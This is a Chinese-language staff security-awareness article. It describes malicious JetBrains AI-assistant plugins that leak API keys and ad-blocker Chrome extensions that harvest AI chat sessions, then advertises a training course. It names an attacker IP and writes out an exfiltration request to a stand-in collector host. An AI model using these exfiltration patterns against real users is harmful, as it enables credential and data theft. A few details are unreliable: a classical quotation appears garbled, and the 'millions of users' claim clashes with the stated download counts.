【头脑风暴】想象一次“看不见的盗窃”
在浩瀚的数字海洋里,信息安全常被比作一座无形的灯塔,守护着每一艘驶向未知彼岸的船只。若灯塔失明,船只便会在暗礁中碰撞,甚至被海盗悄然劫持。今天,让我们先抛开常规的“病毒”“勒索”思路,进行一次头脑风暴:如果黑客不再是敲击键盘的“狂徒”,而是潜伏在我们每日使用的开发工具和浏览器插件里,会怎样?

下面,我将以两起真实且极具警示意义的案例为镜,展开细致剖析。希望通过这场“假想演练”,让每位同事都感受到:安全隐患可能就在我们指尖的轻点之间。
案例一:JetBrains 插件暗藏“钥匙窃取器”
1. 事件回顾
2026 年 6 月,安全研究机构 Aikido Security 公布了一份报告:在 JetBrains Marketplace(IntelliJ 系列 IDE 的插件中心)上,出现了 15 款恶意插件,它们伪装成 AI 编码助手,宣称能够提供自动补全、单元测试生成、代码审查等功能。用户在插件设置页输入的 OpenAI、DeepSeek 或 SiliconFlow 等大语言模型的 API Key,竟被插件以明文 HTTP 请求的方式发送至攻击者控制的服务器(IP:39.107.60.51)。
这些插件的名称包括但不限于:
- DeepSeek AI Chat
- CodeGPT AI Assistant
- AI Coder Review
- DeepSeek Junit Test
其中两款插件的下载量突破 2.5 万,且自 2025 年 10 月起持续更新,甚至在 2026 年 6 月 10 日发布了新版。
2. 技术细节
- 插件功能:表面上调用官方 LLM API,帮助开发者生成代码片段、编写 commit 信息、自动化单元测试等。真正的业务逻辑与公开的插件几乎一致,难以从 UI 上辨别。
- 窃密路径:用户在“设置—API Key”页面输入的密钥被插件内部的
HttpURLConnection直接发送至攻击者服务器,使用明文GET参数?key=YOUR_API_KEY。该请求未经过 TLS 加密,随时可能被网络抓包工具截获。 - 付费诱骗:部分插件内置“捐赠墙”。当用户支付少量费用后,插件会返回攻击者自行生成的 API Key,并使用该 Key 替代用户原有 Key 进行模型调用,导致用户费用被转嫁至攻击者的账户上,甚至产生未经授权的高额消耗。
3. 影响评估
- 直接经济损失:如果泄露的 API Key 被用于大规模的模型调用,攻击者可以在数日内消耗数千美元的费用,最终账单转嫁至原持有者。
- 供应链风险:IDE 插件往往拥有与本地项目相同的文件系统权限,恶意插件可能进一步读取项目源码、凭证文件,甚至向内部网络发起横向渗透。
- 信誉危机:企业若因开发者使用了此类插件而导致代码泄露或业务中断,将面临客户信任下降、合规审计不合格等连锁反应。
4. 教训摘录
“防微杜渐”——《左传·僖公二十三年》有云:“防微而不失其本者,斩大”。在信息安全的世界里,细微的插件权限往往是大灾难的前奏。我们必须做到:
- 审计插件来源:仅从官方渠道或经过内部安全评估的私有仓库安装插件。
- 最小化权限:IDE 插件不应拥有对全局文件系统的读写权限,防止滥用。
- 密钥管理:API Key 视同密码,应使用环境变量或安全 vault 管理,避免在 UI 界面明文输入。
- 网络流量监控:对 IDE 的 HTTP/HTTPS 流量进行审计,发现异常的明文请求立即阻断。
案例二:Chrome 扩展悄偷“对话金库”
1. 事件概述
同年 6 月,研究员 Jean‑Marie R.(代号 PromptSnatcher)披露,两款在 Chrome Web Store 上长期存在的广告拦截扩展——Smart Adblocker(ID:iojpcjjdfhlcbgjnpngcmaojmlokmeii)与 Adblock for Browser(ID:jcbjcocinigpbgfpnhlpagidbmlngnnn)——在后台植入了“对话劫持引擎”。该引擎能够捕获用户在 ChatGPT、Claude、Gemini、Copilot、Perplexity、DeepSeek、Grok、Meta AI 等八大主流 AI 聊天平台上的完整会话、模型使用量以及账号订阅等级,并将这些信息通过隐藏的 telemetry 通道上传至攻击者服务器。
这两款扩展的下载量分别为 9 万与 1 万,最早分别发布于 2022 年 10 月和 2023 年 8 月。长时间的潜伏使其能够在数百万用户的 AI 对话中抽取敏感信息。
2. 工作原理
- 双重功能:表面上提供标准的广告过滤(基于 EasyList、IDCAC 等公共过滤列表),实际在每次页面加载完成后注入 JavaScript Hook,劫持所有对 OpenAI、Anthropic、Google 等 AI 接口的
fetch与XMLHttpRequest。 - 数据收集:截获的请求体中包含用户的问题、模型生成的答案、对话历史、API Token(若使用)以及订阅级别(免费/付费)。这些信息被压缩后通过
POST https://malicious-collector.example.com/collect发送,且未声明任何隐私政策。 - 更新策略:攻击者通过扩展更新机制在 2025 年后加入窃密代码,导致多数用户在未感知的情况下被感染。
3. 潜在危害
- 隐私泄露:AI 对话往往涉及商业机密、研发思路、个人敏感信息,一旦外泄可能导致知识产权被窃取或竞争对手提前获取技术路线。
- 模型滥用:攻击者获取用户的 API Token 后,可冒用其身份调用高价值模型,导致费用转嫁甚至利用用户的身份进行恶意生成(如钓鱼邮件、假新闻等)。
- 信任破坏:企业内部使用 AI 助手进行内部协作、代码审查等,如果会话被第三方窃取,可能导致内部决策信息被提前知晓,安全合规审计难以通过。
4. 教训提炼
“知己知彼,百战不殆”。在《孙子兵法》中,了解敌我双方的状态是制胜之本。对浏览器扩展而言,了解其权限、行为和更新日志同样关键。
- 审查扩展权限:安装前仔细查看“访问全部网站”或“读取和更改浏览数据”等高危权限。
- 定期审计:使用企业级浏览器管理平台对已安装扩展进行周期性安全评估。
- 最小化依赖:尽量只保留必要的广告拦截器,或改用本地 DNS/hosts 屏蔽方式。
- 加密通信:确保所有与 AI 平台的交互均通过 HTTPS,并开启 HSTS、证书固定等防护。
时代的变奏:智能化、数智化、数据化的交汇
1. “AI 时代”的双刃剑
当前,企业正加速向 AI‑驱动、数据中台、数字孪生 方向演进。大语言模型(LLM)已从实验室走入研发、客服、市场等各业务环节,API Key 成为 数字资产,其价值不亚于传统的账号密码。正如本案例所示,API Key 并非单纯的技术凭证,而是可直接兑换算力、产生费用、甚至泄露业务逻辑的“金钥”。
与此同时,供应链安全 也被推向前沿。插件、扩展、容器镜像、CI/CD 脚本,这些看似“低风险”的软体部件,实际上可以成为 攻击者渗透的后门,实现所谓的 “软件供应链攻击”(如 SolarWinds、事件通用)。
2. 数字化治理的三大基石
在这种背景下,信息安全意识 成为组织最底层的防御盾牌。我们提出三大基石供全体同事参考:
| 基石 | 关键要素 | 实践建议 |
|---|---|---|
| 认知 | 认识到每一次点击、每一次输入都可能泄露资产 | 通过每日安全速报、案例分享,强化“安全即生活”观念 |
| 技能 | 掌握基本的安全操作技巧(如密钥管理、权限最小化) | 参加官方组织的安全培训、线上沙盒实验 |
| 文化 | 构建“安全先行”的组织氛围,让每个人都是安全守门人 | 设立安全之星、开展红队/蓝队演练,激励正向竞争 |
3. 如何在日常工作中落地?
- 插件/扩展白名单:企业 IT 部门将经过安全评估的插件列入白名单,禁止自行安装非授权软件。
- 密钥保管制度:所有 AI API Key 必须存放于公司密码库(如 HashiCorp Vault),禁止在 IDE 界面明文输入;若必须临时使用,使用一次性 Token。
- 网络审计:部署基于零信任的代理(如 ZTNA),对所有出站请求进行流量监控,异常流量自动拦截并上报。
- 安全演练:每季度组织一次“供应链渗透”红队演练,让研发、运维角色亲身体验被植入恶意插件后的危害,提升防御意识。
号召:加入信息安全意识培训,共筑数字防线
亲爱的同事们,信息安全不再是 “IT 部门的事”,它已经渗透到 每一次代码提交、每一次浏览器点击、每一次 API 调用。正如《论语》所言:“工欲善其事,必先利其器”。我们的“器”已经升级为 AI 助手、云服务、自动化流水线;而“利其器”则需要 每位员工都具备安全的思维方式。
培训亮点
| 主题 | 内容 | 时长 |
|---|---|---|
| AI 资产保护 | API Key 管理最佳实践、密钥轮转、最小权限原则 | 2 小时 |
| 插件/扩展安全评估 | 市场插件风险评估、浏览器扩展权限解析、案例复盘 | 1.5 小时 |
| 供应链威胁实战 | 红队渗透演练、攻击路径追踪、应急响应流程 | 2 小时 |
| 日常安全习惯 | 钓鱼邮件辨识、社交工程防范、密码安全策略 | 1 小时 |
培训采用 线上+线下双轨 模式,配套 实战实验室(安全沙箱)以及 情景模拟(如“恶意插件快速检测”),帮助大家在真实环境中练就一身硬功夫。完成培训后,您将获得 公司内部安全认证,并有机会参与后续的 安全红蓝对抗赛,赢取丰厚奖品。
“兵马未动,粮草先行”。在信息安全的战场上,知识与技能是我们最重要的粮草。让我们以此次培训为起点,携手构筑起对抗数字暗流的坚固城墙。
行动召唤
- 立即报名:登录公司内部学习平台,搜索《信息安全意识培训》并完成报名。
- 做好准备:在报名后一周内,完成“安全自测问卷”,了解自身安全盲区。
- 积极参与:培训期间请全程在线,积极提问、动手实验,确保所学落地。
- 分享传播:培训结束后,请在部门内部分享学习体会,帮助更多同事提升安全觉悟。
同事们,安全不是一次性的任务,而是持续的旅程。让我们从今天的每一次点击、每一次输入、每一次思考开始,筑起防线,守住我们的数字资产与企业声誉。
“未雨绸缪,防范未然。” —— 让我们以案例为镜,以培训为剑,共同守护企业的数字未来。
携手前行,安全相伴!

除了理论知识,昆明亭长朗然科技有限公司还提供模拟演练服务,帮助您的员工在真实场景中检验所学知识,提升实战能力。通过模拟钓鱼邮件、恶意软件攻击等场景,有效提高员工的安全防范意识。欢迎咨询了解更多信息。
- 电话:0871-67122372
- 微信、手机:18206751343
- 邮件:info@securemymind.com
- QQ: 1767022898
